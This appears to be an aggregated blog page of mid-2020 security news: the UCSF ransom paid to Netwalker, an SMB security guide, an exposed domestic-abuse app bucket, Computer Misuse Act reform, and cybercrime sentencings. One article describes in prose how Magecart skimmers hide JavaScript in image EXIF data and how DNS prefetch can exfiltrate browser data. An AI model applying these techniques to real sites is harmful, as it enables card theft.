A California university which is dedicated solely to public health research has paid a $1.14m ransom to a criminal gang in the hopes of regaining access to its data.

The University of California San Francisco (UCSF) paid out in the apparently successful hope that the Netwalker group would send it a decryption utility for its illicitly encrypted files, which it referred to as “data … important to some of the academic work we pursue as a university serving the public good”.

A negotiator acting on behalf of UCSF was said to have opened the bidding for the decryptor at $780,000, according to the BBC which claimed that an “anonymous tipoff” allowed it to “follow the ransom negotiations in a live chat on the dark web”.

Maze ransomware gang threatens to publish sensitive stolen data after US aerospace biz sensibly refuses to pay

READ MORE

UCSF said miscreants had “encrypted a limited number of servers within the School of Medicine” – on 1 June – and said on Friday that it was working with outside experts to “fully restore the affected servers”. While the university is carrying out research on COVID-19, it said in a public statement that the attack did not affect that.

It also noted that patient medical records and patient care were not affected – the university has a teaching hospital attached, the San Francisco Medical Center.

Infosec researcher Brett Callow of threat intel biz Emsisoft told The Register that Netwalker is one of the gangs that did not join a previous underworld declaration by more “ethical” criminals who promised to avoid attacking institutions fighting the coronavirus pandemic.

The Register has asked UCSF for comment about the ransom payments as well as about its data backup processes.

Sophos published a blog post a few weeks ago going into depth about Netwalker’s tactics and tools.

Britain’s state-owned broadcaster also published what it said were extracts of live chat messages posted by the criminals as they negotiated with UCSF over the ransom. Using news media attention as a means of increasing pressure on victims to pay up is an increasingly popular tactic among ransomware gangs.

Some have even established clearnet and darknet blogs where they post snippets of leaked data and rant about uncooperative victims, in the hope of attracting journalists’ attention and headlines that put the spotlight on victims and pressure others into paying.

British government advice, increasingly echoed around the world, is not to pay ransoms. There’s no guarantee that criminals will stick by their word and, indeed, there is every incentive for them to score a payout from desperate victims and then auction off stolen data regardless of promises not to do so. ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

Watching a $1.14 million ransomware negotiation between hackers and scientists searching for COVID-19 treatments

Watching a $1.14 million ransomware negotiation between hackers and scientists searching for COVID-19 treatments

An anonymous tip-off to BBC News enabled them to watch in real-time as an American medical university attempted to negotiate with the hackers who had infected its systems with ransomware.

As reporter Joe Tidy describes, the University of California San Francisco (UCSF) was attacked by the notorious NetWalker ransomware on the first day of June.

Netwalker message

Netwalker message

A ransom demand left by the gang directed the university dedicated to medical research to a payment page on the dark web, where they could find an FAQ, an offer of a “free” sample of a decrypted file (proving decryption was possible), and the ability – just like so many legitimate websites – to have a live chat with a support operator.

Netwalker chat message. Source: BBC News

Netwalker chat message. Source: BBC News

NetWalker chat message. Source: BBC News

Of course, negotiating the safe recovery of your encrypted files is so much more stressful when the webpage also contains a countdown timer, threatening to either double the ransom demand or publish stolen data onto the internet if time runs out.

Six hours after asking, the University of California San Francisco must have been relieved to have been given more time, and for news of the attack to be removed from NetWalker’s public website.

Netwalker chat message. Source: BBC News

Netwalker chat message. Source: BBC News

NetWalker chat message. Source: BBC News

However, the hackers demanded $3 million, and were less than impressed when whoever was at the UCSF’s end of the conversation begged them to accept $780,000 citing the “financially devastating” damage caused by the Coronavirus pandemic. UCSF has been conducting antibiotic clinical trials in the fight against COVID-19.

Netwalker chat message. Source: BBC News

Netwalker chat message. Source: BBC News

NetWalker chat message. Source: BBC News

Ultimately, after what BBC News describes as a “day of back-and-forth negotiations,” the two sides agreed to a final payment of $1,140,895. 116.4 bitcoins were transferred to cryptocurrency wallets owned by the NetWalker gang the following day, and the university received the decryption software required to recover its affected data.

Email

Email

Sign up to our newsletterSign up to Graham Cluley’s newsletter – “GCHQ”
Security news, advice, and tips.

Speaking to BBC News, UCSF explained why it had decided to give in to its digital extortionists:

“The data that was encrypted is important to some of the academic work we pursue as a university serving the public good.

“We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained.

“It would be a mistake to assume that all of the statements and claims made in the negotiations are factually accurate.”

Nobody likes the idea of cybercriminals making money out of successful ransomware attacks. Everytime one organisation decides to pay its extortionists it incentivises malicious hackers to launch yet more ransomware attacks against unsuspecting targets.

At the same time, I can understand how organisations that feel they have no other option might make the difficult decision that it’s better to pay the criminals than have their organisation further disrupted, or its data exposed on the internet.

The University is now said to be assisting in the FBI’s investigation into the attack, and restoring its affected systems.

One final thought for you all: whose interest is it in to tip-off BBC News about a ransomware negotiation as it happens?

Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.

Follow me for more information.

SMBs are responsible for nearly 44% of US economic activity, but given the current climate, it can be difficult for them to find available and/or affordable resources.

As organizations across the country begin to emerge from their mandatory COVID-19 hibernations, the transition could be difficult for many as they continue to feel the brunt of the health crisis and its economic impact. These challenges would be exacerbated for small and midsize businesses (SMBs). Although reopenings and renewed operations offer initial hope, they’re also being met with a great deal of uncertainty because many SMBs have fewer resources — in terms of capital and personnel — than they previously had.

Often overshadowed by large enterprises, SMBs are responsible for nearly 44% of economic activity in the United States, according to the US Small Business Administration. But given the current climate, it can be difficult for SMBs to find available and/or affordable resources, and they are finding themselves easy targets for cyberattacks. In response, they are looking to the cybersecurity community now more than ever for accessible cybersecurity solutions, especially considering the never-ending wave of malware, ransomware, and phishing campaigns.

What exactly should SMBs be looking for as they determine the best products and services to mitigate their cybersecurity issues and enhance their overall security postures? Here are three simple, yet effective suggestions.

Simple Pricing
First and foremost, finding free or low-cost versions of cybersecurity products or services is a must. Luckily for SMBs, many organizations have offered their solutions at discounted rates in response to the coronavirus pandemic. These security vendors are rightfully recognizing how essential it is to keep SMBs — which serve as the backbone of their local economies — up and running. By taking advantage of these discounts and forming initial business relationships with vendors, SMBs that weather the COVID-19 storm will already have the resources and relationships in place to scale their security needs once “normal” operations resume.

However, it’s important to note that SMBs should look out for any fine print attached to discounted solutions regarding geographic boundaries, user threshold limits, and specific time frames. While anyone in need of enhanced security should have the ability to access such terms, this is often not the case, and SMBs should be especially wary of hidden or misleading disclaimers.

Ease of Installation and Deployment
SMBs typically employ small IT teams that often cover security as a secondary skill set, so it can be understandingly overwhelming for them to choose from among the sheer number of available security products and services. This also makes it difficult for them to understand which of the thousands of solutions on the market are the right fit for their business needs. Even if all of the details are outlined, SMB decision-makers can still struggle with simply knowing how to respond to active threats and deploying the technology. Therefore, solutions that are very simple, both in terms of installation and deployment, should be prioritized by those involved in leadership positions.

Low Maintenance and User Experience
Similarly, ongoing maintenance that does not require a dedicated IT or security team to constantly implement updates or include additional customizations should be emphasized when comparing options. Given that day-to-day users will likely not be security-savvy, having an intuitive user experience should be a key component of any security solution under consideration. Employees will want to be able to maintain their level of productivity while simultaneously staying secure. Ultimately, the balance between easy maintenance and enhanced usability is a delicate one, but SMBs shouldn’t think they have to trade one for the other. 

By taking these three recommendations to heart, SMBs can improve their overall security and collectively protect the businesses that make up nearly half of our country’s economy. Even better, they’ll be able to keep their doors open for business to customers and keep their workers employed, while keeping both parties secure from cyber threats.

Related Articles:

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

 

Kowsik Guruswamy is CTO of Menlo Security. Previously, he was co-­founder and CTO at Mu Dynamics, which pioneered a new way to analyze networked products for security vulnerabilities. Before Mu, he was a distinguished engineer at Juniper Networks. Kowsik joined Juniper … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

One the face of it, it sounded like a good idea.

A smartphone app, disguised as a regular app delivering the top world, sports, and entertainment news, containing a secret feature that allows victims of domestic abuse to send a covert distress call for help at the touch of a button.

That was the idea behind the free Aspire News App, launched some years ago by When Georgia Smiled, a US non-profit founded by Robin McGraw and her husband US TV star “Dr Phil” to help victims of domestic violence and sexual assault.

To be honest, that still sounds like a good idea to me – if the app is coded well, and if any data it collects is properly secured.

But what isn’t a good idea is for voice recordings made by the app to be left exposed on an unsecured Amazon Web Services (AWS) S3 bucket, allowing anyone with internet access to download them and listen if they so wish.

According to security researchers at VPN Mentor, who found the exposed data, over 4,000 voice recordings of emergency messages left by victims of domestic violence were available to access – no password required.

Some of the 230MB worth of recordings included personally identifiable information such as names, home addresses, as well as the identities of violent abusers.

Transcripts of just two of the recordings that were exposed reveal the seriousness of the situation:

“[Full Name] is threatening or hurting me. Please send help now. [Full address]”

and

“Please call the police right away and have them come to [Full Address]. I am in great danger. I need you to send the police right away, please…”

Potentially, if the information fell into the wrong hands it could not only expose people who did not want the data revealed at the risk of extortion, but it could also put victims in greater physical danger if their abuser found out.

The researchers attempted to reach out to When Georgia Smiled and the Dr. Phil Foundation to get the serious data breach fixed last Wednesday, but ultimately it took the involvement of AWS itself to get the unsecured web bucket shut down.

So, that’s a happy end to the story, right?

Well, perhaps not.

You see, a security failure like this could lead to victims of domestic abuse losing confidence in Aspire News App. If they do not feel safe any longer using the app, they may find it harder to escape abusive relationships safely.

That clearly wasn’t what Dr Phil and his wife Robin McGraw wanted – the Aspire News app was supposed to help people escape dangerous situations, not make it even harder to find a way out.

Follow me for more information.

British infosec businesses are celebrating the 30th birthday of the Computer Misuse Act 1990 by writing to Prime Minister Boris Johnson urging reform of the elderly cybercrime law.

The Computer Misuse Act (CMA) received Royal Assent on 29 June 1990, before “the concept of cyber security and threat intelligence research,” the CyberUp campaign group said in its letter [PDF].

“Now, 30 years on, the CMA is the central regime governing cybercrime in the UK despite being originally designed to protect telephone exchanges,” it added. “This means that the CMA inadvertently criminalises a large proportion of modern cyber defence practices.”

CyberUp was founded by a coalition of infosec firms including NCC Group, Orpheus Cyber, Context Information Security and Nettitude, as we reported last summer when the campaign wrote its first letter to the PM.

So far Boris hasn’t got round to replying.

CyberUp’s latest missive, that carries twenty signatories, warns: “With less threat intelligence research being carried out, the UK’s critical national infrastructure is left at an increased risk of cyber attacks from criminals and state actors.”

The main problem posed by the current CMA is that it criminalises any “unauthorised access”, under section 1 of the act, to a computer. This means “defensive cyber activities” of the sort carried out by CyberUp’s members are at best in a grey area – and at worst classified as downright illegal; as the campaign put it, “criminals are obviously very unlikely to explicitly authorise such access.”

In January a group of academics published a detailed report echoing calls for the CMA to be reformed, including detailed legal proposals on exactly how to tweak the offences created by the act.

The CMA itself was passed into law after the legendary 1985 Prestel hack on Prince Phillip’s email inbox. Prosecutors tried and failed to convict journalists Steve Gold and Robert Schifreen of forgery after the duo spotted mainframe login credentials had been left publicly exposed and typed them in to see what would happen. The logic was that they had somehow forged the password; something that the Court of Appeal eventually threw out.

Around 40 CMA cases are brought to court every year with about 90 per cent of prosecutions resulting in a conviction, according to court data analysed by The Register last year.

The only corporate CMA prosecution to date took place in 2018. A firm called Smart Recruitment, a trading name of Workchain Ltd, hatched a plot to diddle junior workers out of company pension contributions. Company managers blagged workers’ account ID numbers from pension provider NEST before logging onto its online system in the workers’ names to click the necessary opt-out buttons. Directors were jailed and the company was fined more than £280,000.

Most recently a Manchester police gunman was jailed under the CMA after abusing his force computer login to find and contact prostitutes whose details had previously been hoovered up by police. ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

credit card hackers

A United States federal district court has finally sentenced a Russian hacker to nine years in federal prison after he pleaded guilty of running two illegal websites devoted to facilitating payment card fraud, computer hacking, and other crimes.

Aleksei Yurievich Burkov, 30, pleaded guilty in January this year to two of the five charges against him for credit card fraud—one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud, and money laundering.

Burkov admitted to operating a website named Cardplanet that was dedicated to buying and selling stolen credit card and debit card data for anywhere between $2.50 and $10 per payment card, depending on the card type, origin, and availability of card owner information.

According to the U.S. Department of Justice, Cardplanet hosted roughly 150,000 payment card details between 2009 and 2013, most of which belonged to U.S. citizens and used to make over $20 million in fraudulent purchases.

“Aleksei’s massive fraud victimized hundreds of thousands of people and resulted in over $20 million in losses,” said G. Zachary Terwilliger, U.S. Attorney for the Eastern District of Virginia.

“Tackling global cybercrime means holding accountable leaders like Burkov who have allowed cybercrime to become organized and hyper-specialized. I want to thank our prosecutors and investigative partners for their terrific work on this complex case.”

In addition to Cardplanet, Burkov ran another invite-only forum website for elite cybercriminals where they advertised stolen personal identifying information (PII), malicious software, and other criminal services, like money laundering and hacking.

To become a member of Burkov’s cybercrime forum, one needed to pay $5,000 as insurance and three existing members to vouch for their excellent reputation among cybercriminals.

According to the court documents, such measures were put in place to “keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum.”

Burkov was arrested at Ben-Gurion Airport near Tel Aviv, Israel, in December 2015 and extradited to the U.S. in November 2019 after he lost his appeals against extradition in the Israeli Supreme Court and the Israeli High Court of Justice.

Before his extradition to the U.S., Russia also offered Israel a deal to release Burkov in exchange for freeing Israeli citizen Naama Issachar, imprisoned in Russia for drug offenses, but Israel refused to release Burkov and approved the U.S. extradition request.

Burkov had faced a maximum of 15 years in prison for the charges he admitted in January, but today the U.S. federal district court judge sentenced him to nine years in prison.

Follow me for more information.

In what’s one of the most innovative hacking campaigns, cybercrime gangs are now hiding malicious code implants in the metadata of image files to covertly steal payment card information entered by visitors on the hacked websites.

“We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores,” Malwarebytes researchers said last week.

“This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot.”

The evolving tactic of the operation, widely known as web skimming or a Magecart attack, comes as bad actors are finding different ways to inject JavaScript scripts, including misconfigured AWS S3 data storage buckets and exploiting content security policy to transmit data to a Google Analytics account under their control.

Using Steganography to Hide Skimmer Code in EXIF

Banking on the growing trend of online shopping, these attacks typically work by inserting malicious code into a compromised site, which surreptitiously harvests and sends user-entered data to a cybercriminal’s server, thus giving them access to shoppers’ payment information.

image metadata

In this week-old campaign, the cybersecurity firm found that the skimmer was not only discovered on an online store running the WooCommerce WordPress plugin but was contained in the EXIF (short for Exchangeable Image File Format) metadata for a suspicious domain’s (cddn.site) favicon image.

Every image comes embedded with information about the image itself, such as the camera manufacturer and model, date and time the photo was taken, the location, resolution, and camera settings, among other details.

Using this EXIF data, the hackers executed a piece of JavaScript that was concealed in the “Copyright” field of the favicon image.

“As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address, and credit card details,” the researchers said.

Aside from encoding the captured information using the Base64 format and reversing the output string, the stolen data is transmitted in the form of an image file to conceal the exfiltration process.

Stating the operation might be the handiwork of Magecart Group 9, Malwarebytes added the JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library.

javascript web skimmer

This is not the first time Magecart groups have used images as attack vectors to compromise e-commerce websites. Back in May, several hacked websites were observed loading a malicious favicon on their checkout pages and subsequently replacing the legitimate online payment forms with a fraudulent substitute that stole user card details.

Abusing DNS Protocol to Exfiltrate Data from the Browser

But data-stealing attacks don’t have to be necessarily confined to malicious skimmer code.

In a separate technique demonstrated by Jessie Li, it’s possible to pilfer data from the browser by leveraging dns-prefetch, a latency-reducing method used to resolve DNS lookups cross-origin domains before resources (e.g., files, links) are requested.

Called “browsertunnel,” the open-source software consists of a server that decodes messages sent by the tool, and a client-side JavaScript library to encode and transmit the messages.

dns prefetch hacking

The messages themselves are arbitrary strings encoded in a subdomain of the top domain being resolved by the browser. The tool then listens for DNS queries, collecting incoming messages, and decoding them to extract the relevant data.

Put differently, ‘browsertunnel’ can be used to amass sensitive information as users carry out specific actions on a webpage and subsequently exfiltrate them to a server by disguising it as DNS traffic.

“DNS traffic does not appear in the browser’s debugging tools, is not blocked by a page’s Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios,” Li said.

Follow me for more information.

In Brief Redmond is bulking up the security around its AzureStack hardware-to-cloud bundle by acquiring infosec firm CyberX.

Microsoft says the newly-integrated security house will be used to help secure industrial gear and other Internet-of-Things devices running under AzureStack, giving companies more reason to buy into the ground-up pitch from Microsoft.

“Microsoft will now provide a simpler approach to unified security governance across both IT and industrial networks, as well as end-to-end security across managed and unmanaged IoT devices, enabling organizations to quickly detect and respond to advanced threats in converged networks,” Redmond boasted.

CardPlanet boss gets nine years

The Russian man behind the notorious criminal hangout website Cardplanet will spend the better part of a decade in a US prison cell.

Aleksei Burkov, 30, operated both the Cardplanet cybercrime forum and a second, invite-only site where crooks trafficked in stolen bank card information. To get into the VIP site, criminals would have to be able to show evidence of at least $5,000 worth of fraud. The nine-year term may actually be something of a relief for Burkov. He has spent the past five years in various nations’ jail systems, having been cuffed in Israel in 2015 and formally extradited to the US in 2019.

DDoS mastermind gets 13 months

A man behind a massive distributed denial-of-service (DDoS) operation will get his mail via the Alaska Department of Corrections for the next year.

Kenneth Schuchman, of Vancouver, Washington, USA, was jailed for 13 months this week after admitting one count of aiding and abetting computer intrusions. Schuchman was the brains behind the massive Satori DDoS botnet: with his two co-conspirators, known as Drake and Vamp, Scuchman built up the massive network of infected PCs and then rented them out to crooks to flood systems off the internet.

Romance scammer busted

William Asiedu, who preyed on women on online dating sites, admitted a charge of wire fraud conspiracy. It is said Asiedu posed as a lonely heart to trick a woman in Arizona and another in Switzerland into sending him $450,000 for what they thought were cash to support their would-be beau. When he is sentenced in October, Asidedu faces up to 20 years behind bars.

Journo’s phone spied on using NSO tech

Israeli spyware maker NSO Group has been linked to the surveillance of a Moroccan journalist. Amnesty International said an iPhone used by Omar Radi was the target of a “network injection” attack using NSO technology. ®

Sponsored: Ransomware has gone nuclear

Follow me for more information.

Product categories

Post

June 2020
SMTWTFS
 123456
78910111213
14151617181920
21222324252627
282930 
X